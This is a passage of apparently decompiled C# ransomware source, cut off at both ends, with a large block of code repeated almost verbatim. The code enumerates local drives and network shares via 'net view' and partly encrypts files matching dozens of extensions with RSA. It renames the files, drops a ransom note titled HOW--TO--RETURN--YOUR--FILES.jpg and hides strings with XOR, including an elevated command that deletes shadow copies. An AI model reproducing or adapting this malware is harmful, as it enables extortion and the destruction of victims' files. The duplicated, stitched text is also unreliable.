= index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } , 0xf2, namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } , 0xf2, 0xfc, namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 